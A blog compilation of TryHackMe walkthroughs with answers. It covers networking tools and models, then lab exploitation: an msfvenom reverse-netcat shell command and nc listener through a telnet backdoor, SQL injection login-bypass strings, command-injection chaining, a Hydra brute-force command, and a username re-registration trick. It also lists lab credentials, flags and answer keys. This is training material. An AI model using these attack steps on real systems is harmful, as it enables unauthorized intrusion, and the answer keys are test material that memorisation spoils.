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Showing posts with label Google search. Show all posts
Showing posts with label Google search. Show all posts
  • Networking tool traceroute

    The logical follow-up to the ping command is 'traceroute'. The easiest way to understand what traceroute does is to think of your home network. Say, for example, that you have a wireless router. Your phone is connected to it, as is your computer. What happens if you want to send something to your phone from your computer? You can't just send stuff directly to your phone -- not without directly connecting them, so how would the information get across? The request would first be sent to your router which acts as a gateway. The router knows every device that's connected to it, ergo, it knows how to get to your phone. The router then forwards your request on to your phone and facilitates the return connection in the same way. Traceroute can be used to map the path your request takes as it heads to the target machine. Networking tool traceroute

    The internet is made up of many, many different servers and end-points, all networked up to each other. This means that, in order to get to the content you actually want, you first need to go through a bunch of other servers. Traceroute allows you to see each of these connections -- it allows you to see every intermediate step between your computer and the resource that you requested. The basic syntax for traceroute on Linux is this: traceroute <destination>

    By default, traceroute operates using the same ICMP protocol that ping utilises, however, this can be altered with switches.

    You can see that it took 13 hops to get from my router (_gateway) to the Google server at

    Now it's your turn. As with before, all questions about switches can be answered with the man page for traceroute
    (man traceroute).

    #1 Use traceroute on tryhackme.com
    Can you see the path your request has taken?

    #2 What switch would you use to specify an interface when using Traceroute?

    Ans :-   -i

    #3 What switch would you use if you wanted to use TCP requests when tracing the route?

    Ans :- -T

    #4 [Lateral Thinking] Which layer of the TCP/IP model will traceroute run on by default?


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  • Networking Ping command

    Network Tool Ping

    At this stage, hopefully all of the theory has made sense and you now understand the basic models behind computer networking. For the rest of the room we're going to be taking a look at some of the command line networking tools that we can use in practical applications. Many of these tools do work on other operating systems, but for the sake of simplicity, I'm going to assume that you're running Linux for the rest of this room. The first tool that we're going to look at will be the ping command. Networking Ping command

    The ping command is used when we want to test whether a connection to a remote resource is possible. Usually this will be a website on the internet, but it could also be for a computer on your home network if you want to check if it's configured correctly. Ping works using the ICMP protocol, which is one of the slightly less well-known TCP/IP protocols that I mentioned earlier. The ICMP protocol works on the Network layer of the OSI Model, and thus the Internet layer of the TCP/IP model. The basic syntax for ping is ping <target>.

    In this example I am using ping to test whether a network connection to Google is possible:

    Notice that the ping command actually returned the IP address for the Google server that it connected to, rather than the URL that I requested. This is a handy secondary application for ping, as it can be used to determine the IP address of the server hosting a website. One of the big advantages of ping is that it's pretty much ubiquitous to any network enabled device. All operating systems support it out of the box, and even most embedded devices can use ping!

    Have a go at the following questions. Any questions about syntax can be answered using the man page for ping (man ping on Linux).

    #1 What command would you use to ping the bbc.co.uk website?

    Ans :- ping bbc.co.uk

    #2 Ping muirlandoracle.co.uk
    What is the IP address?

    Ans :-

    #3 What switch lets you change the interval of sent ping requests?

    Ans :- -i

    #4 What switch would allow you to restrict requests to IPV4?

    Ans :- -4

    #5 What switch would give you a more verbose output?

    Ans :- -v

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  • All about telnet network services

    Understanding Telnet

    What is Telnet?

    Telnet is an application protocol which allows you, with the use of a telnet client, to connect to and execute commands on a remote machine that's hosting a telnet server. All about telnet network services

    The telnet client will establish a connection with the server. The client will then become a virtual terminal- allowing you to interact with the remote host.





    Telnet sends all messages in clear text and has no specific security mechanisms. Thus, in many applications and services, Telnet has been replaced by SSH in most implementations.

    How does Telnet work?

    The user connects to the server by using the Telnet protocol, which means entering "telnet" into a command prompt. The user then executes commands on the server by using specific Telnet commands in the Telnet prompt. You can connect to a telnet server with the following syntax: "telnet [ip] [port]"

    #1 What is Telnet?   

    Ans :- Application Protocol

    #2 What has slowly replaced Telnet?   

    Ans :- SSH

    #3 How would you connect to a Telnet server with the IP on port 23?

    Ans :- telnet 23

    #4 The lack of what, means that all Telnet communication is in plaintext?

    Ans :- encryption

    Enumerating Telnet

    Lets Get Started

    Before we begin, make sure to deploy the room and give it some time to boot. Please be aware, this can take up to five minutes so be patient!


    We've already seen how key enumeration can be in exploiting a misconfigured network service. However, vulnerabilities that could be potentially trivial to exploit don't always jump out at us. For that reason, especially when it comes to enumerating network services, we need to be thorough in our method.

    Port Scanning

    Let's start out the same way we usually do, a port scan, to find out as much information as we can about the services, applications, structure and operating system of the target machine. Scan the machine with nmap and the tag -A and -p-.


    -A : Enables OS Detection, Version Detection, Script Scanning and Traceroute all in one

    -p- : Enables scanning across all ports, not just the top 1000


    Let's see what's going on on the target server...

    #1 How many ports are open on the target machine?   

    #2 What port is this?

    #3 This port is unassigned, but still lists the protocol it's using, what protocol is this?    

    #4 Now re-run the nmap scan, without the -p- tag, how many ports show up as open?

    #5 Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It's important to try every angle when enumerating, as the information you gather here will inform your exploitation stage.

    Based on the title returned to us, what do we think this port could be used for?

    #7 Who could it belong to? Gathering possible usernames is an important step in enumeration.

    #8 Always keep a note of information you find during your enumeration stage, so you can refer back to it when you move on to try exploits.

    Exploiting Telnet

    Types of Telnet Exploit

    Telnet, being a protocol, is in and of itself insecure for the reasons we talked about earlier. It lacks encryption, so sends all communication over plaintext, and for the most part has poor access control. There are CVE's for Telnet client and server systems, however, so when exploiting you can check for those on:

    •     https://www.cvedetails.com/
    •     https://cve.mitre.org/

    A CVE, short for Common Vulnerabilities and Exposures, is a list of publicly disclosed computer security flaws. When someone refers to a CVE, they usually mean the CVE ID number assigned to a security flaw.

    However, you're far more likely to find a misconfiguration in how telnet has been configured or is operating that will allow you to exploit it.

    Method Breakdown

    So, from our enumeration stage, we know:
    •     - There is a poorly hidden telnet service running on this machine
    •     - The service itself is marked "backdoor"
    •     - We have possible username of "Skidy" implicated

    Using this information, let's try accessing this telnet port, and using that as a foothold to get a full reverse shell on the machine!

    Connecting to Telnet

    You can connect to a telnet server with the following syntax:

    "telnet [ip] [port]"

    We're going to need to keep this in mind as we try and exploit this machine.



    What is a Reverse Shell?

    A "shell" can simply be described as a piece of code or program which can be used to gain code or command execution on a device.
    A reverse shell is a type of shell in which the target machine communicates back to the attacking machine.

    The attacking machine has a listening port, on which it receives the connection, resulting in code or command execution being achieved.

    #1 Okay, let's try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.

    #2 Great! It's an open telnet connection! What welcome message do we receive?

    #3 Let's try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)

    #4 Hmm... that's strange. Let's check to see if what we're typing is being executed as a system command.

    #5 Start a tcpdump listener on your local machine using: "sudo tcpdump ip proto \\icmp -i tun0" This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.

    #6 Now, use the command "ping [local tun0 ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)

    #7 Great! This means that we are able to execute system commands AND that we are able to reach our local machine. Now let's have some fun!

    #8 We're going to generate a reverse shell payload using msfvenom.This will generate and encode a netcat reverse shell for us. Here's our syntax:
    "msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R"

    • -p = payload
    • lhost = our local host IP address
    • lport = the port to listen on
    • R = export the payload in raw format

    What word does the generated payload start with?

    #9 Perfect. We're nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

    "nc -lvp [listening port]"

    What would the command look like for the listening port we selected in our payload?

    #10 Great! Now that's running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully- this will give us a shell on the target machine!

    #11 Success! What is the contents of flag.txt?

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  • Wireshark Capture Network Traffic

    We've gone over the basic theory -- now let's put it into practice! In this task we're going to look at some captured network traffic to see the advantages of understanding the OSI and TCP/IP Models. Wireshark Capture Network  Traffic

    Wireshark is a tool used to capture and analyse packets of data going across a network.

    We're going to use Wireshark to get an idea of what these models look like in practice, with real world data.

    Download the attached .pcap file (Wireshark capture) and follow along!

    Click Here :- PCAP FIle 

    When you first load the packet into Wireshark you're given a list of captured data in the top window (there are two items in this window just now), and in the bottom two windows you're shown the data contained in each captured packet of data:

    Currently we're looking at the first packet, so let's have a look at the data in a little more detail:

    There are 5 pieces of information here:

    Frame 1 -- this is showing details from the physical layer of the OSI model (Network Interface layer of the TCP/IP model): the size of the packet received in terms of bytes)

    Ethernet II -- this is showing details from the Data Link layer of the OSI model (Network Interface layer of the TCP/IP model): the transmission medium (in this case an Ethernet cable), as well as the source and destination MAC addresses of the request.

    Internet Protocol Version 4 -- this is showing details from the Network layer of the OSI model (Internet Layer of the TCP/IP model): the source and destination IP addresses of the request.

    Transmission Control Protocol -- this is showing details from the Transport layer of the OSI and TCP/IP models: in this case it's telling us that the protocol was TCP, along with a few other things that we're not covering here.

    Hypertext Transfer Protocol -- this is showing details from the Application layer of the OSI and TCP/IP models: specifically, this is a HTTP GET request, which is requesting a web page from a remote server.

    This is not a Wireshark room, so we're not going to go into any more depth than that. The important thing is that you understand how the theory you learnt earlier translated into a real life scenario.

    With that in mind, click on the second captured packet (in the top window) and answer the following questions:

    #1 What is the protocol specified in the section of the request that's linked to the Application layer of the OSI and TCP/IP Models?

    Ans :- Domain name system

    #2 Which layer of the OSI model does the section that shows the IP address "" link to (Name of the layer)?

    Ans :- Network

    #3 In the section of the request that links to the Transport layer of the OSI and TCP/IP models, which protocol is specified?

    Ans :- User Datagram Protocol

    #4 Over what medium has this request been made (linked to the Data Link layer of the OSI model)?

    Ans :- Etnernet II

    #5 Which layer of the OSI model does the section that shows the number of bytes transferred (81) link to?

    Ans :- Physical

    #6 [Research] Can you figure out what kind of address is shown in the layer linked to the Data Link layer of the OSI model?

    Ans :- MAC

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  • dig in Networking tools

    We talked about domains in the previous task -- now lets talk about how they work.

    Ever wondered how a URL gets converted into an IP address that your computer can understand? The answer is a TCP/IP protocol called DNS (Domain Name System). dig in Networking tools dig in Networking tools

    At the most basic level, DNS allows us to ask a special server to give us the IP address of the website we're trying to access. For example, if we made a request to www.google.com, our computer would first send a request to a special DNS server (which your computer already knows how to find). The server would then go looking for the IP address for Google and send it back to us. Our computer could then send the request to the IP of the Google server.

    Let's break this down a bit.

    You make a request to a website. The first thing that your computer does is check its local cache to see if it's already got an IP address stored for the website; if it does, great. If not, it goes to the next stage of the process.

    Assuming the address hasn't already been found, your computer will then send a request to what's known as a recursive DNS server. These will automatically be known to the router on your network. Many Internet Service Providers (ISPs) maintain their own recursive servers, but companies such as Google and OpenDNS also control recursive servers. This is how your computer automatically knows where to send the request for information: details for a recursive DNS server are stored in your router. This server will also maintain a cache of results for popular domains; however, if the website you've requested isn't stored in the cache, the recursive server will pass the request on to a root name server.

    There are precisely 13 root name DNS servers in the world. The root name servers essentially keep track of the DNS servers in the next level down, choosing an appropriate one to redirect your request to. These lower level servers are called Top-Level Domain servers.

    Top-Level Domain (TLD) servers are split up into extensions. So, for example, if you were searching for tryhackme.com your request would be redirected to a TLD server that handled .com domains. If you were searching for bbc.co.uk your request would be redirected to a TLD server that handles .co.uk domains. As with root name servers, TLD servers keep track of the next level down: Authoritative name servers. When a TLD server receives your request for information, the server passes it down to an appropriate Authoritative name server.

    Authoritative name servers are used to store DNS records for domains directly. In other words, every domain in the world will have it's DNS records stored on an Authoritative name server somewhere or another; they are the source of the information. When your request reaches the authoritative name server for the domain you're querying, it will send the relevant information back to you, allowing your computer to connect to the IP address behind the domain you requested.

    When you visit a website in your web browser this all happens automatically, but we can also do it manually with a tool called dig . Like ping and traceroute, dig should be installed automatically on Linux systems.

    Dig allows us to manually query recursive DNS servers of our choice for information about domains:
    dig <domain> @<dns-server-ip>

    It is a very useful tool for network troubleshooting.

    This is a lot of information. We're currently most interested in the ANSWER section for this room; however, taking the time to learn what the rest of this means is a very good idea. In summary, that information is telling us that we sent it one query and successfully (i.e. No Errors) received one full answer -- which, as expected, contains the IP address for the domain name that we queried.

    Another interesting piece of information that dig gives us is the TTL (Time To Live) of the queried DNS record. As mentioned previously, when your computer queries a domain name, it stores the results in its local cache. The TTL of the record tells your computer when to stop considering the record as being valid -- i.e. when it should request the data again, rather than relying on the cached copy.

    The TTL can be found in the second column of the answer section:

    It's important to remember that TTL (in the context of DNS caching) is measured in seconds, so the record in the example will expire in two minutes and thirty-seven seconds.

    Have a go at some questions about DNS and dig.

    #1 What is DNS short for?

    Ans :- Domain name system

    #2 What is the first type of DNS server your computer would query when you search for a domain?

    Ans :- Recursive

    #3 What type of DNS server contains records specific to domain extensions (i.e. .com, .co.uk, etc)? Use the long version of the name.

    Ans :- Top-level Domain

    #4 Where is the very first place your computer would look to find the IP address of a domain?

    Ans :- Local Cache

    #5 [Research] Google runs two public DNS servers. One of them can be queried with the IP, what is the IP address of the other one?

    Ans :-

    #6 If a DNS query has a TTL of 24 hours, what number would the dig query show?

    Ans :- 86400

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  • Networking in whois lookup

    Domain Names -- the unsung saviours of the internet.

    Can you imagine how it would feel to remember the IP address of every website you want to visit? Horrible thought.

    Fortunately, we've got domains.

    We'll talk a little bit more about how this works in the next task, but for now suffice to know that a domain translates into an IP address so that we don't need to remember it (e.g. you can type tryhackme.com, rather than the TryHackMe IP address). Domains are leased out by companies called Domain Registrars. If you want a domain, you go and register with a registrar, then lease the domain for a certain length of time.

    Enter Whois.

    Whois essentially allows you to query who a domain name is registered to. In Europe personal details are redacted; however, elsewhere you can potentially get a great deal of information from a whois search.

    There is a web version of the whois tool if you're particularly adverse to the command line. Either way, let's get started!

    (Note: You may need to install whois before using it. On Debian based systems this can be done with sudo apt update && sudo apt-get install whois)

    Whois lookups are very easy to perform. Just use whois <domain> to get a list of available information about the domain registration:

    This is comparatively a very small amount of information as can often be found. Notice that we've got the domain name, the company that registered the domain, the last renewal, and when it's next due, and a bunch of information about nameservers (which we'll look at in the next task). Networking in whois lookup

    #1 Perform a whois search on facebook.com

    Ans :-

    #2 What is the registrant postal code for facebook.com?

    Ans :- 94025

    #3 When was the facebook.com domain first registered?

    Ans :- 29/03/1997

    #4 Perform a whois search on microsoft.com

    Ans :- no answer needed

    #5 Which city is the registrant based in?

    Ans :- Redmond

    #6 [OSINT] What is the name of the golf course that is near the registrant address for microsoft.com?

    Ans :- Bellevue Golf Course

    #7 What is the registered Tech Email for microsoft.com?

    Ans :- msnhst@microsoft.com

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  • The TCP IP Model in Networking

    The TCP IP Model

    The TCP/IP model is, in many ways, very similar to the OSI model. It's a few years older, and serves as the basis for real-world networking. The TCP/IP model consists of four layers: Application, Transport, Internet and Network Interface. Between them, these cover the same range of functions as the seven layers of the OSI Model. The TCP IP Model in Networking

    You would be justified in asking why we bother with the OSI model if it's not actually used for anything in the real-world. The answer to that question is quite simply that the OSI model (due to being less condensed and more rigid than the TCP/IP model) tends to be easier for learning the initial theory of networking.

    The two models match up something like this:

    The processes of encapsulation and de-encapsulation work in exactly the same way with the TCP/IP model as they do with the OSI model. At each layer of the TCP/IP model a header is added during encapsulation, and removed during de-encapsulation.

    Now let's get down to the practical side of things.

    A layered model is great as a visual aid -- it shows us the general process of how data can be encapsulated and sent across a network, but how does it actually happen?

    When we talk about TCP/IP, it's all well and good to think about a table with four layers in it, but we're actually talking about a suite of protocols -- sets of rules that define how an action is to be carried out. TCP/IP takes its name from the two most important of these: the Transmission Control Protocol (which we touched upon earlier in the OSI model) that controls the flow of data between two endpoints, and the Internet Protocol, which controls how packets are addressed and sent. There are many more protocols that make up the TCP/IP suite; we will cover some of these in later tasks. For now though, let's talk about TCP.

    As mentioned earlier, TCP is a connection-based protocol. In other words, before you send any data via TCP, you must first form a stable connection between the two computers. The process of forming this connection is called the three-way handshake.

    When you attempt to make a connection, your computer first sends a special request to the remote server indicating that it wants to initialise a connection. This request contains something called a SYN (short for synchronise) bit, which essentially makes first contact in starting the connection process. The server will then respond with a packet containing the SYN bit, as well as another "acknowledgement" bit, called ACK. Finally, your computer will send a packet that contains the ACK bit by itself, confirming that the connection has been setup successfully. With the three-way handshake successfully completed, data can be reliably transmitted between the two computers. Any data that is lost or corrupted on transmission is re-sent, thus leading to a connection which appears to be lossless.

    (Credit Kieran Smith, Abertay University, TryHackMe)

    We're not going to go into exactly how this works on a step-to-step level -- not in this room at any rate. It is sufficient to know that the three-way handshake must be carried out before a connection can be established using TCP.


    It's important to understand exactly why the TCP/IP and OSI models were originally created. To begin with there was no standardisation -- different manufacturers followed their own methodologies, and consequently systems made by different manufacturers were completely incompatible when it came to networking. The TCP/IP model was introduced by the American DoD in 1982 to provide a standard -- something for all of the different manufacturers to follow. This sorted out the inconsistency problems. Later the OSI model was also introduced by the International Organisation for Standardisation (ISO); however, it's mainly used as a more comprehensive guide for learning, as the TCP/IP model is still the standard upon which modern networking is based.

    #1 Which model was introduced first, OSI or TCP/IP?

    ans :- TCP/IP

    #2 Which layer of the TCP/IP model covers the functionality of the Transport layer of the OSI model (Full Name)?

    ANs :- transport

    #3 Which layer of the TCP/IP model covers the functionality of the Session layer of the OSI model (Full Name)?

    Ans :- Application

    #4 The Network Interface layer of the TCP/IP model covers the functionality of two layers in the OSI model. These layers are Data Link, and?.. (Full Name)?

    Ans :- Physical

    #5 Which layer of the TCP/IP model handles the functionality of the OSI network layer?

    Ans :- Internet

    #6 What kind of protocol is TCP?

    Ans :- Connection-based

    #7 What is SYN short for?

    Ans:- Synchronise

    #8 What is the second step of the three way handshake?

    Ans :- SYN/ACK

    #9 What is the short name for the "Acknowledgement" segment in the three-way handshake?

    Ans :-  ACK

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  • TryHackMe Pickle Rick Walkthrough

    Greeting there, it is time for another tryhackme CTF write-up. Today, we are going through the Rick and Morty inspired CTF room. This room is called pickle rickkkkkkkkkkkkkkkk. Interesting huh. This is one of the easiest  challenges on the site. Without further ado, let’s get into the challenge.TryHackMe Pickle Rick Walkthrough

    We need to find the three secret ingredients in order to turn Rick back to his old self. Rick mentioned something on the webserver. Let’s enumerate the machine by using Nmap scanner.

    nmap -A -Pn -sC -sV --script vuln

    Visit TryHackMe IP Address

    Look like a message from Rick. The three secret ingredients are inside Rick’s computer. I have to get it. Before that, let’s check with the source code for more information.

    username :-

    We have the username now. How about the password? Time to use the gobuster.

    gobuster dir -u -w /usr/share/dirb/wordlists/common.txt

    We got robots.txt file inside the webserver. Gonna check it out.

    password :-

    Let's use gobuster again via GUI based...

    Yup, we just missed the portal.php files. Time to visit the portal site.

    The portal site has been resolved into a login page. How about trying the login credential we found it earlier (user: R1ckRul3s, pass: Wubbalubbadubdub)?

    After Login

    [Task 1] Pickle Rick

    This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle.

    #1 Deploy the virtual machine on this task and explore the web application.

    What is the first ingredient Rick needs?

    ls -la

    less Sup3rS3cretPickl3Ingred.txt


    #2 Whats the second ingredient Rick needs?

    ls -la /home

    ls -la /home/rick

    less '/home/rick/second ingredients'

    There is another ingredient file hidden inside the file system. There might be another user inside the system.

    The second ingredient is inside the rick’s directory.

    #3 Whats the final ingredient Rick needs?

    I guess the next ingredient locate at /root directory. Before we make a visit to the directory, let see what we can do for the sudo command.

    sudo -l

    Cool, we can do everything using the sudo command. Let see what is inside the /root directory.

    sudo ls -la /root

    Yes, the third ingredient is inside the root directory.

    sudo less  /root/3rd.txt

    We are now gathering all 3 ingredients. yupeeeee!!!!

    Video Tutorial :soon otherwise search me on youtube kumar atul jaiswal



    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!

    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.

    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.

    - Hacking Truth by Kumar Atul Jaiswal

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  • TryHackMe Avengers Blog Walkthrough

    Learn to hack into Tony Stark's machine! You will enumerate the machine, bypass a login portal via SQL injection and gain root access by command injection. TryHackMe Avengers Blog Walkthrough

    [Task 2] Cookies

    HTTP Cookies is a small piece of data sent from a website and stored on the user's computer by the user's web browser while the user is browsing. They're intended to remember things such as your login information, items in your shopping cart or language you prefer.

    Advertisers can use also tracking cookies to identify which sites you've previously visited or where about's on a web-page you've clicked. Some tracking cookies have become so intrusive, many anti-virus programs classify them as spyware.

    You can view & dynamically update your cookies directly in your browser. To do this, press F12 (or right click and select Inspect) to open the developer tools on your browser, then click Application and then Cookies.

    #1 On the deployed Avengers machine you recently deployed, get the flag1 cookie value.

    [Task 3] HTTP Headers

    HTTP Headers let a client and server pass information with a HTTP request or response. Header names and values are separated by a single colon and are integral part of the HTTP protocol.

    The main two HTTP Methods are POST and GET requests. The GET method us used to request data from a resource and the POST method is used to send data to a server.

    We can view requests made to and from our browser by opening the Developer Tools again and navigating to the Network tab. Have this tab open and refresh the page to see all requests made. You will be able to see the original request made from your browser to the web server.

    #1 Look at the HTTP response headers and obtain flag 2.

    [Task 4] Enumeration and FTP

    In your terminal, execute the following command:

    nmap <machine_ip> -v

    nmap -A -Pn -T4 -sC -sV --script vuln

    This will scan the machine and determine what services on which ports are running. For this machine, you will see the following ports open:

    Port 80 has a HTTP web server running on
    Port 22 is to SSH into the machine
    Port 21 is used for FTP (file transfer)

    We've accessed the web server, lets now access the FTP service. If you read the Avengers web page, you will see that Rocket made a post asking for Groot's password to be reset, the post included his old password too!

    In your terminal, execute the following command:

    ftp <machine_ip>

    We will be asked for a username (groot) and a password (iamgroot). We should have now successfully logged into the FTP share using Groots credentials!


    username :- groot
    password :- iamgroot

    ftp> passive
    ftp> ls
    ftp> cd files
    ftp> ls
    ftp> get flag3.txt

    #1 Look around the FTP share and read flag 3!

    [Task 5] GoBuster

    Lets use a fast directory discovery tool called GoBuster. This program will locate a directory that you can use to login to Mr. Starks Tarvis portal!

    GoBuster is a tool used to brute-force URIs (directories and files), DNS subdomains and virtual host names. For this machine, we will focus on using it to brute-force directories.

    You can either download GoBuster, or use the Kali Linux machine that has it pre-installed.

    Lets run GoBuster with a wordlist (on Kali they're located under /usr/share/wordlists):

    gobuster dir -u http://<machine_ip> -w <word_list_location>

    gobuster dir -u -w /usr/share/dirb/wordlists/common.txt

    #1 What is the directory that has an Avengers login?

    [Task 6] SQL Injection

    You should now see the following page above. We're going to manually exploit this page using an attack called SQL injection.

    SQL Injection is a code injection technique that manipulates an SQL query. You can execute you're own SQL that could destroy the database, reveal all database data (such as usernames and passwords) or trick the web server in authenticating you.

    To exploit SQL, we first need to know how it works. A SQL query could be SELECT * FROM Users WHERE username = {User Input} AND password = 
    {User Input 2} , if you insert additional SQL as the {User Input} we can manipulate this query. For example, if I have the {User Input 2} as ' 1=1 we could trick the query into authenticating us as the ' character would break the SQL query and 1=1 would evaluate to be true.

    To conclude, having our first {User Input} as the username of the account and {User Input 2} being the condition to make the query true, the final query would be:

    SELECT * FROM Users WHERE username = `admin` AND password = `' 1=1`

    This would authenticate us as the admin user.

    #1 Log into the Avengers site. View the page source, how many lines of code are there?

    username  :-    ' or 1=1 -- -
    possword  :-    ' or 1=1 -- -

    Right click > view page source > count no of code

    [Task 7] Remote Code Execution and Linux

    You should be logged into the Jarvis access panel! Here we can execute commands on the machine.. I wonder if we can exploit this to read files on the system.

    Try executing the ls command to list all files in the current directory. Now try joining 2 Linux commands together to list files in the parent directory: cd ../; ls doing so will show a file called flag5.txt, we can add another command to read this file: cd ../; ls; cat flag5.txt

    But oh-no! The cat command is disallowed! We will have to think of another Linux command we can use to read it!

    #1 Read the contents of flag5.txt

    cd ../; ls;

    cd ../; ls; cat flag5.txt

    but as you can see command disallowed

    so, type the following command and hit enter  :-

    cd ../; ls; rev flag5.txt

    but this flag is not correct, copy this flag and go to your linux terminal and type the following command and hit enter

    echo "7fa8171a96976e1ab85563f31d2e533d" | rev

    Video Tutorial :soon otherwise search me on youtube kumar atul jaiswal



    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!

    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.

    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.

    - Hacking Truth by Kumar Atul Jaiswal

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  • TryHackMe Authenticate Room Walkthrough

    Learn how to attack authentication mechanisms used in web applications

    A new room opened up recently on TryHackMe called Authenticate, so I thought I'd give it a shot and write this blog post whilst doing it. TryHackMe Authenticate Room Walkthrough

    It looks to be a relatively simple "walkthrough" style room where they give you all the information you need in order to crack it.

    I shall try to use different methods than the intended path as a test to show that for a lot of tasks there are many ways you can solve the challenges.

    Scan a room IP

    Tool :- Nmap*

    nmap -A -Pn -sC -sV --script vuln

    [Task 1] Deploy the VM

    In today's time, the use of the authentication system is increasing because of the increase in the number of services that are coming up on the internet. But not everyone knows how to either make proper authentication software or how to properly set up one.

    The aim of this room is to teach how to find authentication bugs and how you can exploit them.

    [Task 2] Dictionary attack

    The very obvious method of attacking any login form is just to brute force the credentials. But in this kind of brute force, we don't simply try numbers or simple alphabets. What we do is take an existing dictionary of commonly used username/passwords and use those to see if we can find the right combination. This is known as Dictionary Attack.

    To perform a dictionary attack we can use a lot of tools like Hydra or Medusa but the issue with these CLI tools is that we need to provide a lot of arguments to them started and that could be confusing. That is why when trying a dictionary attack on a web application/form it's better to use Burp Suite. In Burp we can capture the login request and then use intruder to perform the attack.

    If you are not familiar with burp suite then I would recommend that you first complete the Learn Burp Suite room.

    Now let me show you an example using the Burp Suite:

    1) Connect on port 8888

    2) Now while the Capture is On in burp suite, enter any values you like in the username and password field.

    3) Send this request to the intruder and for the position of the payload, we are just going to guess the password for the user jack. For payload, you can use any know default password list or maybe load a part of rockYou.

    Note: Here I know that there exists a user named jack and that is why I am using that. In a real-life scenario, you might have to guess both the username and password.

    4)  Start the attack and wait for a bit. If you did everything correctly you'll notice that one of the requests sent by an intruder will have a bigger response then all of the others.

    As you can see in the above screenshot that on the 5th request the length value is 530 and the length of the content in other requests is 480. This could mean that the burp was able to successfully login in Jack's account using the password 12345678.

    #1 What is the flag you found after logging as Jack?

    Ans :-  fad9ddc1feebd9e9bca05f02dd89e271

    Our Method

    Tool :- Hydra

    hydra -l mike -P /home/hackerboy/Documents/rockyou.txt "http-post-form://^USER^&password=^PASS^:Invalid"

    -l : For username
    -p : For wordlist
    http-post-form :- Nmap*
    8888 : Nmap*

    #2 Now try the same thing for username mike.

    Ans :-  

    #3 What is the flag you found after logging as Mike?

    Ans :- 

    [Task 3] Re-registration

    In the previous task, we saw that it is possible to just simply guess/brute force the password with the help of a password dictionary. In this task, we are going to focus on a vulnerability that is unique in its own way.

    A lot of times what happens is that developer forgets to sanitize the input(username & password) given by the user in the code of their application which can make them vulnerable to things like SQL injection but SQLi could be a bit difficult to exploit. So we are going to focus on a vulnerability that happens because of a developer's mistake but is very easy to exploit i.e re-registration of an existing user.

    Let's understand this with the help of an example, say there is an existing user with the name admin and now we want to get access to their account so what we can do is try to re-register that username but with slight modification. We are going to enter " admin"(notice the space in the starting). Now when you enter that in the username field and enter other required information like email id or password and submit that data. It will actually register a new user but that user will have the same right as normal admin. And that new user will also be able to see all the content present under the user admin.

    To see this in action go to port 8888  and try to register a user name darren, you'll see that user already exists so then try to register a user " darren" and you'll see that you are now logged in and will be able to see the content present only in Darren's account which in our case is the flag that you need to retrieve.

    #1 What is the flag that you found in darren's account?

    Note :- Space with highlated mark 

    Ans :- fe86079416a21a3c99937fea8874b667

    #2 Now try to do the same trick and see if you can login as arthur.

    Ans :- No Answer Needed

    #3 What is the flag that you found in arthur's account?

    Ans :- please Try it yourself

    [Task 4] JSON Web Token

    JSON Web Token(JWT) is one of the commonly used methods for authorization. This is a kind of cookie that is generated using HMAC hashing or public/private keys. So unlike any other kind of cookie, it lets the website know what kind of access the currently logged in user has. The only special thing about JWT is that they are in JSON format(after decoding).

    JWT can be divided into 3 parts separated by a dot(.)

    1) Header:  This consists of the algorithm used and the type of the token.

    {  "alg": "HS256", "typ": "JWT"}

    alg could be HMAC, RSA, SHA256 or can even contain None value.

    2) Payload: This is part that contains the access given to the certain user etc. This can vary from website to website, some can just have a simple username and some ID and others could have a lot of other details.

    3) Signature: This is the part that is used to make sure that the integrity of the data was maintained while transferring it from a user's computer to the server and back. This is encrypted with whatever algorithm or alg that was passed in the header's value. And this can only be decrypted with a predefined secret(which should be difficult to)

    Now to put all the 3 part together we base64 encode all of them separated by a dot(.) so it would look something like:


    Note: This example was taken from jwt.io and you should check that website out if you want to learn more about JWT.


    If used properly this is a very secure way of authorization but the problem is with using is "properly". A lot of developers misconfigure their system leaving it open to exploitation.

    Now one of the methods to exploit this is to perform a brute force/dictionary attack and find the secret used for encrypting the JWT token and then used that to generate new tokens. But here we are not going to do that, we are going to see a very amazing way of exploiting this.

